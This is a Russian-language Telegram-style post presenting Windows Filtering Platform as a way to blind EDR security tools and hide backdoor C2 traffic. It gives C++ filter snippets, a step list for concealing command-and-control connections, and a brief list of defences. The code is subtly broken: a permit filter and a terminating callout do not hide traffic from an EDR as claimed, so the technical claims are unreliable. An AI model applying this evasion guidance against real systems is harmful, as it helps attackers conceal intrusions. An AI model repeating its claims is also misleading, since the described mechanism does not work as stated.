### Глушилка для EDR: Обходим механизмы безопасности через Windows Filtering Platform 🛡🔇
EDR (Endpoint Detection and Response) — это системы защиты рабочих станций, но их можно «ослепить», используя легальные механизмы Windows. Разберём, как использовать Windows Filtering Platform (WFP) для скрытия сетевой активности от EDR.
---
## 🔍 1. Как EDR отслеживает сетевую активность?
- Фильтрация сетевых событий (подключения, DNS-запросы).
- Анализ трафика на основе сигнатур.
- Внедрение в процессы для мониторинга вызовов API.
---
## 💻 2. Использование WFP для обхода EDR
### 🔹 Что такое Windows Filtering Platform?
WFP — это фреймворк для управления сетевым трафиком в Windows. С его помощью можно:
✅ Блокировать/разрешать соединения.
✅ Скрывать трафик от EDR.
✅ Перенаправлять соединения.
### 🔹 Пример: скрытие DNS-запросов
Создаём фильтр, который скрывает DNS-запросы к серверу злоумышленника:
// Псевдокод на C++
FWPM_FILTER0 filter = { 0 };
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_PERMIT;
filter.weight.type = FWP_EMPTY;
filter.numFilterConditions = 1;
filter.filterCondition[0].fieldKey = FWPM_CONDITION_IP_REMOTE_ADDRESS;
filter.filterCondition[0].matchType = FWP_MATCH_EQUAL;
filter.filterCondition[0].conditionValue.type = FWP_UINT32;
filter.filterCondition[0].conditionValue.uint32 = inet_addr("8.8.8.8"); // DNS-сервер
FwpmFilterAdd0(engine, &filter, NULL, NULL);
### 🔹 Скрытие TCP-соединений
Добавляем правило, которое скрывает соединения на определённый порт:
FWPM_FILTER0 filter = { 0 };
filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_CALLOUT_TERMINATING; // Скрываем соединение
filter.weight.type = FWP_EMPTY;
filter.numFilterConditions = 1;
filter.filterCondition[0].fieldKey = FWPM_CONDITION_IP_REMOTE_PORT;
filter.filterCondition[0].matchType = FWP_MATCH_EQUAL;
filter.filterCondition[0].conditionValue.type = FWP_UINT16;
filter.filterCondition[0].conditionValue.uint16 = 443; // HTTPS-порт
FwpmFilterAdd0(engine, &filter, NULL, NULL);
---
## ⚡️ 3. Практическое применение
### 🔹 Скрытие бекдора
Если EDR отслеживает подключения к C2-серверу, можно скрыть трафик через WFP:
1. Создаём правило для IP C2-сервера.
2. Разрешаем трафик, но скрываем его от EDR.
3. EDR не видит соединение, так как оно обрабатывается на уровне WFP.
### 🔹 Обход детекта на основе поведения
EDR может анализировать поведение процессов. WFP позволяет:
- Скрыть сетевую активность от EDR.
- Имитировать легитимный трафик.
---
## 🛡 4. Как защититься от таких атак?
✅ Мониторинг изменений в WFP (Event ID 5152 в Windows Security Log).
✅ Анализ поведения процессов (не только сетевой активности).
✅ Использование EDR с защитой от вмешательства (например, контроль целостности драйверов).
---
### 💡 Вывод
WFP — мощный инструмент, который можно использовать как для защиты, так и для обхода EDR. Легальные механизмы Windows могут стать оружием в руках злоумышленника.
🔗 Примеры кода и детали — в канале: [t.me/Safety_Y](https://t.me/Safety_Y)
#EDR #WFP #WindowsSecurity #RedTeam
P.S. Сталкивались с обходом EDR? Делитесь в комментах! 👇
